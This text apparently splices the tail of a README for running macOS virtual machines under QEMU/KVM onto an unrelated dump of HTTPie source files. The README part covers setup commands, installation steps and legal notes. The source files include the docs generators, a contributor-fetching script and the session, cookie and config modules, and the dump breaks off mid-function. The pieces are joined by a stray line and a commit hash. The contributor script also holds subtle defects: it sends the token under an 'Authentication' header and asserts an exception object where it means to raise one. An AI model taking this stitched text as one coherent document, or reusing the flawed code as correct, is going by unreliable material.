tweak on the host machine to work. ``` sudo modprobe kvm; echo 1 | sudo tee /sys/module/kvm/parameters/ignore_msrs ``` To make this change permanent, you may use the following command. ``` sudo cp kvm.conf /etc/modprobe.d/kvm.conf # for intel boxes only sudo cp kvm_amd.conf /etc/modprobe.d/kvm.conf # for amd boxes only ``` * Add user to the `kvm` and `libvirt` groups (might be needed). ``` sudo usermod -aG kvm $(whoami) sudo usermod -aG libvirt $(whoami) sudo usermod -aG input $(whoami) ``` Note: Re-login after executing this command. * Fetch macOS installer. ``` ./fetch-macOS-v2.py ``` You can choose your desired macOS version here. After executing this step, you should have the `BaseSystem.dmg` file in the current folder. ATTENTION: Let `>= Big Sur` setup sit at the `Country Selection` screen, and other similar places for a while if things are being slow. The initial macOS setup wizard will eventually succeed. Sample run: ``` $ ./fetch-macOS-v2.py 1. High Sierra (10.13) 2. Mojave (10.14) 3. Catalina (10.15) 4. Big Sur (11.7) 5. Monterey (12.6) 6. Ventura (13) - RECOMMENDED 7. Sonoma (14) Choose a product to download (1-7): 6 ``` Note: Modern NVIDIA GPUs are supported on HighSierra but not on later versions of macOS. * Convert the downloaded `BaseSystem.dmg` file into the `BaseSystem.img` file. ``` dmg2img -i BaseSystem.dmg BaseSystem.img ``` * Create a virtual HDD image where macOS will be installed. If you change the name of the disk image from `mac_hdd_ng.img` to something else, the boot scripts will need to be updated to point to the new image name. ``` qemu-img create -f qcow2 mac_hdd_ng.img 256G ``` NOTE: Create this HDD image file on a fast SSD/NVMe disk for best results. * Now you are ready to install macOS 🚀 ### Installation - CLI method (primary). Just run the `OpenCore-Boot.sh` script to start the installation process. ``` ./OpenCore-Boot.sh ``` Note: This same script works for all recent macOS versions. - Use the `Disk Utility` tool within the macOS installer to partition, and format the virtual disk attached to the macOS VM. Use `APFS` (the default) for modern macOS versions. - Go ahead, and install macOS 🙌 - (OPTIONAL) Use this macOS VM disk with libvirt (virt-manager / virsh stuff). - Edit `macOS-libvirt-Catalina.xml` file and change the various file paths (search for `CHANGEME` strings in that file). The following command should do the trick usually. ``` sed "s/CHANGEME/$USER/g" macOS-libvirt-Catalina.xml > macOS.xml virt-xml-validate macOS.xml ``` - Create a VM by running the following command. ```bash virsh --connect qemu:///system define macOS.xml ``` - If needed, grant necessary permissions to libvirt-qemu user, ``` sudo setfacl -m u:libvirt-qemu:rx /home/$USER sudo setfacl -R -m u:libvirt-qemu:rx /home/$USER/OSX-KVM ``` - Launch `virt-manager` and start the `macOS` virtual machine. ### Headless macOS - Use the provided [boot-macOS-headless.sh](./boot-macOS-headless.sh) script. ``` ./boot-macOS-headless.sh ``` ### Setting Expectations Right Nice job on setting up a `Virtual Hackintosh` system! Such a system can be used for a variety of purposes (e.g. software builds, testing, reversing work), and it may be all you need, along with some tweaks documented in this repository. However, such a system lacks graphical acceleration, a reliable sound sub-system, USB 3 functionality and other similar things. To enable these things, take a look at our [notes](notes.md). We would like to resume our testing and documentation work around this area. Please [reach out to us](mailto:[email protected]?subject=[GitHub]%20OSX-KVM%20Funding%20Support) if you are able to fund this area of work. It is possible to have 'beyond-native-apple-hw' performance but it does require work, patience, and a bit of luck (perhaps?). ### Post-Installation * See [networking notes](networking-qemu-kvm-howto.txt) on how to setup networking in your VM, outbound and also inbound for remote access to your VM via SSH, VNC, etc. * To passthrough GPUs and other devices, see [these notes](notes.md#gpu-passthrough-notes). * Need a different resolution? Check out the [notes](notes.md#change-resolution-in-opencore) included in this repository. * Trouble with iMessage? Check out the [notes](notes.md#trouble-with-imessage) included in this repository. * Highly recommended macOS tweaks - https://github.com/sickcodes/osx-optimizer ### Is This Legal? The "secret" Apple OSK string is widely available on the Internet. It is also included in a public court document [available here](http://www.rcfp.org/sites/default/files/docs/20120105_202426_apple_sealing.pdf). I am not a lawyer but it seems that Apple's attempt(s) to get the OSK string treated as a trade secret did not work out. Due to these reasons, the OSK string is freely included in this repository. Please review the ['Legality of Hackintoshing' documentation bits from Dortania's OpenCore Install Guide](https://dortania.github.io/OpenCore-Install-Guide/why-oc.html#legality-of-hackintoshing). Gabriel Somlo also has [some thoughts](http://www.contrib.andrew.cmu.edu/~somlo/OSXKVM/) on the legal aspects involved in running macOS under QEMU/KVM. You may also find [this 'Announcing Amazon EC2 Mac instances for macOS' article](https://aws.amazon.com/about-aws/whats-new/2020/11/announcing-amazon-ec2-mac-instances-for-macos/ ) interesting. Note: It is your responsibility to understand, and accept (or not accept) the Apple EULA. Note: This is not legal advice, so please make the proper assessments yourself and discuss with your lawyers if you have any concerns (Text credit: Dortania) ### Motivation My aim is to enable macOS based educational tasks, builds + testing, kernel debugging, reversing, and macOS security research in an easy, reproducible manner without getting 'invested' in Apple's closed ecosystem (too heavily). These `Virtual Hackintosh` systems are not intended to replace the genuine physical macOS systems. Personally speaking, this repository has been a way for me to 'exit' the Apple ecosystem. It has helped me to test and compare the interoperability of `Canon CanoScan LiDE 120` scanner, and `Brother HL-2250DN` laser printer. And these devices now work decently enough on modern versions of Ubuntu (Yay for free software). Also, a long time back, I had to completely wipe my (then) brand new `MacBook Pro (Retina, 15-inch, Late 2013)` and install Xubuntu on it - as the `OS X` kernel kept crashing on it! Backstory: I was a (poor) student in Canada in a previous life and Apple made [my work on cracking Apple Keychains](https://github.com/openwall/john/blob/bleeding-jumbo/src/keychain_fmt_plug.c) a lot harder than it needed to be. This is how I got interested in Hackintosh systems.
cli
f4cf43ecdd6c5c52b5c4ba91086d5c6ccfebcd6d
File: setup.py from setuptools import setup setup() File: docs/installation/generate.py import re import sys from pathlib import Path from typing import Dict import yaml from jinja2 import Template Database = Dict[str, dict] # Files HERE = Path(__file__).parent DB_FILE = HERE / 'methods.yml' DOC_FILE = HERE.parent / 'README.md' TPL_FILE = HERE / 'installation.jinja2' # Database keys KEY_DOC_STRUCTURE = 'docs-structure' KEY_TOOLS = 'tools' # Markers in-between content will be put. MARKER_START = '<div data-installation-instructions>' MARKER_END = '</div>' def generate_documentation() -> str: database = load_database() structure = build_docs_structure(database) template = Template(source=TPL_FILE.read_text(encoding='utf-8')) output = template.render(structure=structure) output = clean_template_output(output) return output def save_doc_file(content: str) -> None: current_doc = load_doc_file() marker_start = current_doc.find(MARKER_START) + len(MARKER_START) assert marker_start > 0, 'cannot find the start marker' marker_end = current_doc.find(MARKER_END, marker_start) assert marker_start < marker_end, f'{marker_end=} < {marker_start=}' updated_doc = ( current_doc[:marker_start] + '\n\n' + content + '\n\n' + current_doc[marker_end:] ) if current_doc != updated_doc: DOC_FILE.write_text(updated_doc, encoding='utf-8') def build_docs_structure(database: Database): tools = database[KEY_TOOLS] assert len(tools) == len({tool['title'] for tool in tools.values()}), 'tool titles need to be unique' tree = database[KEY_DOC_STRUCTURE] structure = [] for platform, tools_ids in tree.items(): assert platform.isalnum(), f'{platform=} must be alphanumeric for generated links to work' platform_tools = [tools[tool_id] for tool_id in tools_ids] structure.append((platform, platform_tools)) return structure def clean_template_output(output): output = '\n'.join(line.strip() for line in output.strip().splitlines()) output = re.sub('\n{3,}', '\n\n', output) return output def load_database() -> Database: return yaml.safe_load(DB_FILE.read_text(encoding='utf-8')) def load_doc_file() -> str: return DOC_FILE.read_text(encoding='utf-8') def main() -> int: content = generate_documentation() save_doc_file(content) return 0 if __name__ == '__main__': sys.exit(main()) File: docs/contributors/fetch.py """ Generate the contributors database. FIXME: replace `requests` calls with the HTTPie API, when available. """ import json import os import re import sys from copy import deepcopy from datetime import datetime from pathlib import Path from subprocess import check_output from time import sleep from typing import Any, Dict, Optional, Set import requests FullNames = Set[str] GitHubLogins = Set[str] Person = Dict[str, str] People = Dict[str, Person] UserInfo = Dict[str, Any] CO_AUTHORS = re.compile(r'Co-authored-by: ([^<]+) <').finditer API_URL = 'https://api.github.com' REPO = OWNER = 'httpie' REPO_URL = f'{API_URL}/repos/{REPO}/{OWNER}' HERE = Path(__file__).parent DB_FILE = HERE / 'people.json' DEFAULT_PERSON: Person = {'committed': [], 'reported': [], 'github': '', 'twitter': ''} SKIPPED_LABELS = {'invalid'} GITHUB_TOKEN = os.getenv('GITHUB_TOKEN') assert GITHUB_TOKEN, 'GITHUB_TOKEN envar is missing' class FinishedForNow(Exception): """Raised when remaining GitHub rate limit is zero.""" def main(previous_release: str, current_release: str) -> int: since = release_date(previous_release) until = release_date(current_release) contributors = load_awesome_people() try: committers = find_committers(since, until) reporters = find_reporters(since, until) except Exception as exc: # We want to save what we fetched so far. So pass. print(' !! ', exc) try: merge_all_the_people(current_release, contributors, committers, reporters) fetch_missing_users_details(contributors) except FinishedForNow: # We want to save what we fetched so far. So pass. print(' !! Committers:', committers) print(' !! Reporters:', reporters) exit_status = 1 else: exit_status = 0 save_awesome_people(contributors) return exit_status def find_committers(since: str, until: str) -> FullNames: url = f'{REPO_URL}/commits' page = 1 per_page = 100 params = { 'since': since, 'until': until, 'per_page': per_page, } committers: FullNames = set() while 'there are commits': params['page'] = page data = fetch(url, params=params) for item in data: commit = item['commit'] committers.add(commit['author']['name']) debug(' >>> Commit', item['html_url']) for co_author in CO_AUTHORS(commit['message']): name = co_author.group(1) committers.add(name) if len(data) < per_page: break page += 1 return committers def find_reporters(since: str, until: str) -> GitHubLogins: url = f'{API_URL}/search/issues' page = 1 per_page = 100 params = { 'q': f'repo:{REPO}/{OWNER} is:issue closed:{since}..{until}', 'per_page': per_page, } reporters: GitHubLogins = set() while 'there are issues': params['page'] = page data = fetch(url, params=params) for item in data['items']: # Filter out unwanted labels. if any(label['name'] in SKIPPED_LABELS for label in item['labels']): continue debug(' >>> Issue', item['html_url']) reporters.add(item['user']['login']) if len(data['items']) < per_page: break page += 1 return reporters def merge_all_the_people(release: str, contributors: People, committers: FullNames, reporters: GitHubLogins) -> None: """ >>> contributors = {'Alice': new_person(github='alice', twitter='alice')} >>> merge_all_the_people('2.6.0', contributors, {}, {}) >>> contributors {'Alice': {'committed': [], 'reported': [], 'github': 'alice', 'twitter': 'alice'}} >>> contributors = {'Bob': new_person(github='bob', twitter='bob')} >>> merge_all_the_people('2.6.0', contributors, {'Bob'}, {'bob'}) >>> contributors {'Bob': {'committed': ['2.6.0'], 'reported': ['2.6.0'], 'github': 'bob', 'twitter': 'bob'}} >>> contributors = {'Charlotte': new_person(github='charlotte', twitter='charlotte', committed=['2.5.0'], reported=['2.5.0'])} >>> merge_all_the_people('2.6.0', contributors, {'Charlotte'}, {'charlotte'}) >>> contributors {'Charlotte': {'committed': ['2.5.0', '2.6.0'], 'reported': ['2.5.0', '2.6.0'], 'github': 'charlotte', 'twitter': 'charlotte'}} """ # Update known contributors. for name, details in contributors.items(): if name in committers: if release not in details['committed']: details['committed'].append(release) committers.remove(name) if details['github'] in reporters: if release not in details['reported']: details['reported'].append(release) reporters.remove(details['github']) # Add new committers. for name in committers: user_info = user(fullname=name) contributors[name] = new_person( github=user_info['login'], twitter=user_info['twitter_username'], committed=[release], ) if user_info['login'] in reporters: contributors[name]['reported'].append(release) reporters.remove(user_info['login']) # Add new reporters. for github_username in reporters: user_info = user(github_username=github_username) contributors[user_info['name'] or user_info['login']] = new_person( github=github_username, twitter=user_info['twitter_username'], reported=[release], ) def release_date(release: str) -> str: date = check_output(['git', 'log', '-1', '--format=%ai', release], text=True).strip() return datetime.strptime(date, '%Y-%m-%d %H:%M:%S %z').isoformat() def load_awesome_people() -> People: try: with DB_FILE.open(encoding='utf-8') as fh: return json.load(fh) except (FileNotFoundError, ValueError): return {} def fetch(url: str, params: Optional[Dict[str, str]] = None) -> UserInfo: headers = { 'Accept': 'application/vnd.github.v3+json', 'Authentication': f'token {GITHUB_TOKEN}' } for retry in range(1, 6): debug(f'[{retry}/5]', f'{url = }', f'{params = }') with requests.get(url, params=params, headers=headers) as req: try: req.raise_for_status() except requests.exceptions.HTTPError as exc: if exc.response.status_code == 403: # 403 Client Error: rate limit exceeded for url: ... now = int(datetime.utcnow().timestamp()) xrate_limit_reset = int(exc.response.headers['X-RateLimit-Reset']) wait = xrate_limit_reset - now if wait > 20: raise FinishedForNow() debug(' !', 'Waiting', wait, 'seconds before another try ...') sleep(wait) continue return req.json() assert ValueError('Rate limit exceeded') def new_person(**kwargs: str) -> Person: data = deepcopy(DEFAULT_PERSON) data.update(**kwargs) return data def user(fullname: Optional[str] = '', github_username: Optional[str] = '') -> UserInfo: if github_username: url = f'{API_URL}/users/{github_username}' return fetch(url) url = f'{API_URL}/search/users' for query in (f'fullname:{fullname}', f'user:{fullname}'): params = { 'q': f'repo:{REPO}/{OWNER} {query}', 'per_page': 1, } user_info = fetch(url, params=params) if user_info['items']: user_url = user_info['items'][0]['url'] return fetch(user_url) def fetch_missing_users_details(people: People) -> None: for name, details in people.items(): if details['github'] and details['twitter']: continue user_info = user(github_username=details['github'], fullname=name) if not details['github']: details['github'] = user_info['login'] if not details['twitter']: details['twitter'] = user_info['twitter_username'] def save_awesome_people(people: People) -> None: with DB_FILE.open(mode='w', encoding='utf-8') as fh: json.dump(people, fh, indent=4, sort_keys=True) fh.write("\n") def debug(*args: Any) -> None: if os.getenv('DEBUG') == '1': print(*args) if __name__ == '__main__': ret = 1 try: ret = main(*sys.argv[1:]) except TypeError: ret = 2 print(f''' Fetch contributors to a release. Usage: python {sys.argv[0]} {sys.argv[0]} <RELEASE N-1> <RELEASE N> Example: python {sys.argv[0]} 2.4.0 2.5.0 Define the DEBUG=1 environment variable to enable verbose output. ''') except KeyboardInterrupt: ret = 255 sys.exit(ret) File: docs/contributors/generate.py """ Generate snippets to copy-paste. """ import sys from jinja2 import Template from fetch import HERE, load_awesome_people TPL_FILE = HERE / 'snippet.jinja2' HTTPIE_TEAM = { 'claudiatd', 'jakubroztocil', 'jkbr', 'isidentical' } BOT_ACCOUNTS = { 'dependabot-sr' } IGNORE_ACCOUNTS = HTTPIE_TEAM | BOT_ACCOUNTS def generate_snippets(release: str) -> str: people = load_awesome_people() contributors = { name: details for name, details in people.items() if details['github'] not in IGNORE_ACCOUNTS and (release in details['committed'] or release in details['reported']) } template = Template(source=TPL_FILE.read_text(encoding='utf-8')) output = template.render(contributors=contributors, release=release) print(output) return 0 if __name__ == '__main__': ret = 1 try: ret = generate_snippets(sys.argv[1]) except (IndexError, TypeError): ret = 2 print(f''' Generate snippets for contributors to a release. Usage: python {sys.argv[0]} {sys.argv[0]} <RELEASE> ''') sys.exit(ret) File: httpie/cookies.py from http import cookiejar _LOCALHOST = 'localhost' _LOCALHOST_SUFFIX = '.localhost' class HTTPieCookiePolicy(cookiejar.DefaultCookiePolicy): def return_ok_secure(self, cookie, request): """Check whether the given cookie is sent to a secure host.""" is_secure_protocol = super().return_ok_secure(cookie, request) if is_secure_protocol: return True # The original implementation of this method only takes secure protocols # (e.g., https) into account, but the latest developments in modern browsers # (chrome, firefox) assume 'localhost' is also a secure location. So we # override it with our own strategy. return self._is_local_host(cookiejar.request_host(request)) def _is_local_host(self, hostname): # Implements the static localhost detection algorithm in firefox. # <https://searchfox.org/mozilla-central/rev/d4d7611ee4dd0003b492b865bc5988a4e6afc985/netwerk/dns/DNS.cpp#205-218> return hostname == _LOCALHOST or hostname.endswith(_LOCALHOST_SUFFIX) File: httpie/sessions.py """ Persistent, JSON-serialized sessions. """ import os import re from http.cookies import SimpleCookie from http.cookiejar import Cookie from pathlib import Path from typing import Any, Dict, List, Optional, Union from requests.auth import AuthBase from requests.cookies import RequestsCookieJar, remove_cookie_by_name from .context import Environment, LogLevel from .cookies import HTTPieCookiePolicy from .cli.dicts import HTTPHeadersDict from .config import BaseConfigDict, DEFAULT_CONFIG_DIR from .utils import url_as_host from .plugins.registry import plugin_manager from .legacy import ( v3_1_0_session_cookie_format as legacy_cookies, v3_2_0_session_header_format as legacy_headers ) SESSIONS_DIR_NAME = 'sessions' DEFAULT_SESSIONS_DIR = DEFAULT_CONFIG_DIR / SESSIONS_DIR_NAME VALID_SESSION_NAME_PATTERN = re.compile('^[a-zA-Z0-9_.-]+$') # Request headers starting with these prefixes won't be stored in sessions. # They are specific to each request. # <https://en.wikipedia.org/wiki/List_of_HTTP_header_fields#Requests> SESSION_IGNORED_HEADER_PREFIXES = ['Content-', 'If-'] # Cookie related options KEPT_COOKIE_OPTIONS = ['name', 'expires', 'path', 'value', 'domain', 'secure'] DEFAULT_COOKIE_PATH = '/' def is_anonymous_session(session_name: str) -> bool: return os.path.sep in session_name def session_hostname_to_dirname(hostname: str, session_name: str) -> str: # host:port => host_port hostname = hostname.replace(':', '_') return os.path.join( SESSIONS_DIR_NAME, hostname, f'{session_name}.json' ) def strip_port(hostname: str) -> str: return hostname.split(':')[0] def materialize_cookie(cookie: Cookie) -> Dict[str, Any]: materialized_cookie = { option: getattr(cookie, option) for option in KEPT_COOKIE_OPTIONS } if ( cookie._rest.get('is_explicit_none') and materialized_cookie['domain'] == '' ): materialized_cookie['domain'] = None return materialized_cookie def materialize_cookies(jar: RequestsCookieJar) -> List[Dict[str, Any]]: return [ materialize_cookie(cookie) for cookie in jar ] def materialize_headers(headers: Dict[str, str]) -> List[Dict[str, Any]]: return [ { 'name': name, 'value': value } for name, value in headers.copy().items() ] def get_httpie_session( env: Environment, config_dir: Path, session_name: str, host: Optional[str], url: str, *, suppress_legacy_warnings: bool = False ) -> 'Session': bound_hostname = host or url_as_host(url) if not bound_hostname: # HACK/FIXME: httpie-unixsocket's URLs have no hostname. bound_hostname = 'localhost' if is_anonymous_session(session_name): path = os.path.expanduser(session_name) session_id = path else: path = config_dir / session_hostname_to_dirname(bound_hostname, session_name) session_id = session_name session = Session( path, env=env, session_id=session_id, bound_host=strip_port(bound_hostname), suppress_legacy_warnings=suppress_legacy_warnings ) session.load() return session class Session(BaseConfigDict): helpurl = 'https://httpie.io/docs#sessions' about = 'HTTPie session file' def __init__( self, path: Union[str, Path], env: Environment, bound_host: str, session_id: str, suppress_legacy_warnings: bool = False, ): super().__init__(path=Path(path)) # Default values for the session files self['headers'] = [] self['cookies'] = [] self['auth'] = { 'type': None, 'username': None, 'password': None } # Runtime state of the Session objects. self.env = env self._headers = HTTPHeadersDict() self.cookie_jar = RequestsCookieJar( # See also a temporary workaround for a Requests bug in `compat.py`. policy=HTTPieCookiePolicy(), ) self.session_id = session_id self.bound_host = bound_host self.suppress_legacy_warnings = suppress_legacy_warnings def _add_cookies(self, cookies: List[Dict[str, Any]]) -> None: for cookie in cookies: domain = cookie.get('domain', '') if domain is None: # domain = None means explicitly lack of cookie, though # requests requires domain to be a string so we'll cast it # manually. cookie['domain'] = '' cookie['rest'] = {'is_explicit_none': True} self.cookie_jar.set(**cookie) def pre_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: for key, deserializer, importer in [ ('cookies', legacy_cookies.pre_process, self._add_cookies), ('headers', legacy_headers.pre_process, self._headers.update), ]: values = data.get(key) if values: normalized_values = deserializer(self, values) else: normalized_values = [] importer(normalized_values) return data def post_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: for key, store, serializer, exporter in [ ('cookies', self.cookie_jar, materialize_cookies, legacy_cookies.post_process), ('headers', self._headers, materialize_headers, legacy_headers.post_process), ]: original_type = type(data.get(key)) values = serializer(store) data[key] = exporter( values, original_type=original_type ) return data def _compute_new_headers(self, request_headers: HTTPHeadersDict) -> HTTPHeadersDict: new_headers = HTTPHeadersDict() for name, value in request_headers.copy().items(): if value is None: continue # Ignore explicitly unset headers original_value = value if type(value) is not str: value = value.decode() if name.lower() == 'user-agent' and value.startswith('HTTPie/'): continue if name.lower() == 'cookie': for cookie_name, morsel in SimpleCookie(value).items(): if not morsel['path']: morsel['path'] = DEFAULT_COOKIE_PATH self.cookie_jar.set(cookie_name, morsel) request_headers.remove_item(name, original_value) continue for prefix in SESSION_IGNORED_HEADER_PREFIXES: if name.lower().startswith(prefix.lower()): break else: new_headers.add(name, value) return new_headers def update_headers(self, request_headers: HTTPHeadersDict): """ Update the session headers with the request ones while ignoring certain name prefixes. """ new_headers = self._compute_new_headers(request_headers) new_keys = new_headers.copy().keys() # New headers will take priority over the existing ones, and override # them directly instead of extending them. for key, value in self._headers.copy().items(): if key in new_keys: continue new_headers.add(key, value) self._headers = new_headers @property def headers(self) -> HTTPHeadersDict: return self._headers.copy() @property def cookies(self) -> RequestsCookieJar: self.cookie_jar.clear_expired_cookies() return self.cookie_jar @cookies.setter def cookies(self, jar: RequestsCookieJar): self.cookie_jar = jar def remove_cookies(self, cookies: List[Dict[str, str]]): for cookie in cookies: remove_cookie_by_name( self.cookie_jar, cookie['name'], domain=cookie.get('domain', None), path=cookie.get('path', None) ) @property def auth(self) -> Optional[AuthBase]: auth = self.get('auth', None) if not auth or not auth['type']: return plugin = plugin_manager.get_auth_plugin(auth['type'])() credentials = {'username': None, 'password': None} try: # New style plugin.raw_auth = auth['raw_auth'] except KeyError: # Old style credentials = { 'username': auth['username'], 'password': auth['password'], } else: if plugin.auth_parse: from .cli.argtypes import parse_auth parsed = parse_auth(plugin.raw_auth) credentials = { 'username': parsed.key, 'password': parsed.value, } return plugin.get_auth(**credentials) @auth.setter def auth(self, auth: dict): assert {'type', 'raw_auth'} == auth.keys() self['auth'] = auth @property def is_anonymous(self): return is_anonymous_session(self.session_id) def warn_legacy_usage(self, warning: str) -> None: if self.suppress_legacy_warnings: return None self.env.log_error( warning, level=LogLevel.WARNING ) # We don't want to spam multiple warnings on each usage, # so if there is already a warning for the legacy usage # we'll skip the next ones. self.suppress_legacy_warnings = True File: httpie/config.py import json import os from pathlib import Path from typing import Any, Dict, Union from . import __version__ from .compat import is_windows from .encoding import UTF8 ENV_XDG_CONFIG_HOME = 'XDG_CONFIG_HOME' ENV_HTTPIE_CONFIG_DIR = 'HTTPIE_CONFIG_DIR' DEFAULT_CONFIG_DIRNAME = 'httpie' DEFAULT_RELATIVE_XDG_CONFIG_HOME = Path('.config') DEFAULT_RELATIVE_LEGACY_CONFIG_DIR = Path('.httpie') DEFAULT_WINDOWS_CONFIG_DIR = Path( os.path.expandvars('%APPDATA%')) / DEFAULT_CONFIG_DIRNAME def get_default_config_dir() -> Path: """ Return the path to the httpie configuration directory. This directory isn't guaranteed to exist, and nor are any of its ancestors (only the legacy ~/.httpie, if returned, is guaranteed to exist). XDG Base Directory Specification support: <https://wiki.archlinux.org/index.php/XDG_Base_Directory> $XDG_CONFIG_HOME is supported; $XDG_CONFIG_DIRS is not """ # 1. explicitly set through env env_config_dir = os.environ.get(ENV_HTTPIE_CONFIG_DIR) if env_config_dir: return Path(env_config_dir) # 2. Windows if is_windows: return DEFAULT_WINDOWS_CONFIG_DIR home_dir = Path.home() # 3. legacy ~/.httpie legacy_config_dir = home_dir / DEFAULT_RELATIVE_LEGACY_CONFIG_DIR if legacy_config_dir.exists(): return legacy_config_dir # 4. XDG xdg_config_home_dir = os.environ.get( ENV_XDG_CONFIG_HOME, # 4.1. explicit home_dir / DEFAULT_RELATIVE_XDG_CONFIG_HOME # 4.2. default ) return Path(xdg_config_home_dir) / DEFAULT_CONFIG_DIRNAME DEFAULT_CONFIG_DIR = get_default_config_dir() class ConfigFileError(Exception): pass def read_raw_config(config_type: str, path: Path) -> Dict[str, Any]: try: with path.open(encoding=UTF8) as f: try: return json.load(f) except ValueError as e: raise ConfigFileError( f'invalid {config_type} file: {e} [{path}]' ) except FileNotFoundError: pass except OSError as e: raise ConfigFileError(f'cannot read {config_type} file: {e}') class BaseConfigDict(dict): name = None helpurl = None about = None def __init__(self, path: Path): super().__init__() self.path = path def ensure_directory(self): self.path.parent.mkdir(mode=0o700, parents=True, exist_ok=True) def is_new(self) -> bool: return not self.path.exists() def pre_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: """Hook for processing the incoming config data.""" return data def post_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: """Hook for processing the outgoing config data.""" return data def load(self): config_type = type(self).__name__.lower() data = read_raw_config(config_type, self.path) if data is not None: data = self.pre_process_data(data) self.update(data) def save(self, *, bump_version: bool = False): self.setdefault('__meta__', {}) if bump_version or 'httpie' not in self['__meta__']: self['__meta__']['httpie'] = __version__ if self.helpurl: self['__meta__']['help'] = self.helpurl if self.about: self['__meta__']['about'] = self.about self.ensure_directory() json_string = json.dumps( obj=self.post_process_data(self), indent=4, sort_keys=True, ensure_ascii=True, ) self.path.write_text(json_string + '\n', encoding=UTF8) @property def version(self): return self.get( '__meta__', {} ).get('httpie', __version__) class Config(BaseConfigDict): FILENAME = 'config.json' DEFAULTS = { 'default_options': [] } def __init__(self, directory: Union[str, Path] = DEFAULT_CONFIG_DIR): self.directory = Path(directory) super().__init__(path=self.directory / self.FILENAME) self.update(self.DEFAULTS) @property def default_options(self) -> list: return self['default_options'] def _configured_path(self, config_option: str, default: str) -> None: return Path( self.get(config_option, self.directory / default) ).expanduser().resolve() @property def plugins_dir(self) -> Path: return self._configured_path('plugins_dir', 'plugins') @property def version_info_file(self) -> Path: return self._configured_path('version_info_file', 'version_info.json') @property def developer_mode(self) -> bool: """This is a special setting for the development environment. It is different from the --debug mode in the terms that it might change the behavior for certain parameters (e.g updater system) that we usually ignore.""" return self.get('developer_mode') File: httpie/compat.py import sys from typing import Any, Optional, Iterable from httpie.cookies import HTTPieCookiePolicy from http import cookiejar # noqa # Request does not carry the original policy attached to the # cookie jar, so until it is resolved we change the global cookie # policy. <https://github.com/psf/requests/issues/5449> cookiejar.DefaultCookiePolicy = HTTPieCookiePolicy is_windows = 'win32' in str(sys.platform).lower() is_frozen = getattr(sys, 'frozen', False) MIN_SUPPORTED_PY_VERSION = (3, 7) MAX_SUPPORTED_PY_VERSION = (3, 11) try: from functools import cached_property except ImportError: # Can be removed once we drop Python <3.8 support. # Taken from `django.utils.functional.cached_property`. class cached_property: """ Decorator that converts a method with a single self argument into a property cached on the instance. A cached property can be made out of an existing method: (e.g. ``url = cached_property(get_absolute_url)``). The optional ``name`` argument is obsolete as of Python 3.6 and will be deprecated in Django 4.0 (#30127). """ name = None @staticmethod def func(instance): raise TypeError( 'Cannot use cached_property instance without calling ' '__set_name__() on it.' ) def __init__(self, func, name=None): self.real_func = func self.__doc__ = getattr(func, '__doc__') def __set_name__(self, owner, name): if self.name is None: self.name = name self.func = self.real_func elif name != self.name: raise TypeError( "Cannot assign the same cached_property to two different names " "(%r and %r)." % (self.name, name) ) def __get__(self, instance, cls=None): """ Call the function and put the return value in instance.__dict__ so that subsequent attribute access on the instance returns the cached value instead of calling cached_property.__get__(). """ if instance is None: return self res = instance.__dict__[self.name] = self.func(instance) return res # importlib_metadata was a provisional module, so the APIs changed quite a few times # between 3.8-3.10. It was also not included in the standard library until 3.8, so # we install the backport for <3.8. if sys.version_info >= (3, 8): import importlib.metadata as importlib_metadata else: import importlib_metadata def find_entry_points(entry_points: Any, group: str) -> Iterable[importlib_metadata.EntryPoint]: if hasattr(entry_points, "select"): # Python 3.10+ / importlib_metadata >= 3.9.0 return entry_points.select(group=group) else: return set(entry_points.get(group, ())) def get_dist_name(entry_point: importlib_metadata.EntryPoint) -> Optional[str]: dist = getattr(entry_point, "dist", None) if dist is not None: # Python 3.10+ return dist.name match = entry_point.pattern.match(entry_point.value) if not (match and match.group('module')): return None package = match.group('module').split('.')[0] try: metadata = importlib_metadata.metadata(package) except importlib_metadata.PackageNotFoundError: return None else: return metadata.get('name') File: httpie/encoding.py from typing import Union, Tuple from charset_normalizer import from_bytes from charset_normalizer.constant import TOO_SMALL_SEQUENCE UTF8 = 'utf-8' ContentBytes = Union[bytearray, bytes] def detect_encoding(content: ContentBytes) -> str: """ We default to UTF-8 if text too short, because the detection can return a random encoding leading to confusing results given the `charset_normalizer` version (< 2.0.5). >>> too_short = ']"foo"' >>> detected = from_bytes(too_short.encode()).best().encoding >>> detected 'ascii' >>> too_short.encode().decode(detected) ']"foo"' """ encoding = UTF8 if len(content) > TOO_SMALL_SEQUENCE: match = from_bytes(bytes(content)).best() if match: encoding = match.encoding return encoding def smart_decode(content: ContentBytes, encoding: str) -> Tuple[str, str]: """Decode `content` using the given `encoding`. If no `encoding` is provided, the best effort is to guess it from `content`. Unicode errors are replaced. """ if not encoding: encoding = detect_encoding(content) return content.decode(encoding, 'replace'), encoding def smart_encode(content: str, encoding: str) -> bytes: """Encode `content` using the given `encoding`. Unicode errors are replaced. """ return content.encode(encoding, 'replace') File: httpie/models.py from time import monotonic import requests from urllib3.util import SKIP_HEADER, SKIPPABLE_HEADERS from enum import Enum, auto from typing import Iterable, Union, NamedTuple from urllib.parse import urlsplit from .cli.constants import ( OUT_REQ_BODY, OUT_REQ_HEAD, OUT_RESP_BODY, OUT_RESP_HEAD, OUT_RESP_META ) from .compat import cached_property from .utils import split_cookies, parse_content_type_header ELAPSED_TIME_LABEL = 'Elapsed time' class HTTPMessage: """Abstract class for HTTP messages.""" def __init__(self, orig): self._orig = orig def iter_body(self, chunk_size: int) -> Iterable[bytes]: """Return an iterator over the body.""" raise NotImplementedError def iter_lines(self, chunk_size: int) -> Iterable[bytes]: """Return an iterator over the body yielding (`line`, `line_feed`).""" raise NotImplementedError @property def headers(self) -> str: """Return a `str` with the message's headers.""" raise NotImplementedError @property def metadata(self) -> str: """Return metadata about the current message.""" raise NotImplementedError @cached_property def encoding(self) -> str: ct, params = parse_content_type_header(self.content_type) return params.get('charset', '') @property def content_type(self) -> str: """Return the message content type.""" ct = self._orig.headers.get('Content-Type', '') if not isinstance(ct, str): ct = ct.decode() return ct class HTTPResponse(HTTPMessage): """A :class:`requests.models.Response` wrapper.""" def iter_body(self, chunk_size=1): return self._orig.iter_content(chunk_size=chunk_size) def iter_lines(self, chunk_size): return ((line, b'\n') for line in self._orig.iter_lines(chunk_size)) @property def headers(self): original = self._orig status_line = f'HTTP/{self.version} {original.status_code} {original.reason}' headers = [status_line] headers.extend( ': '.join(header) for header in original.headers.items() if header[0] != 'Set-Cookie' ) headers.extend( 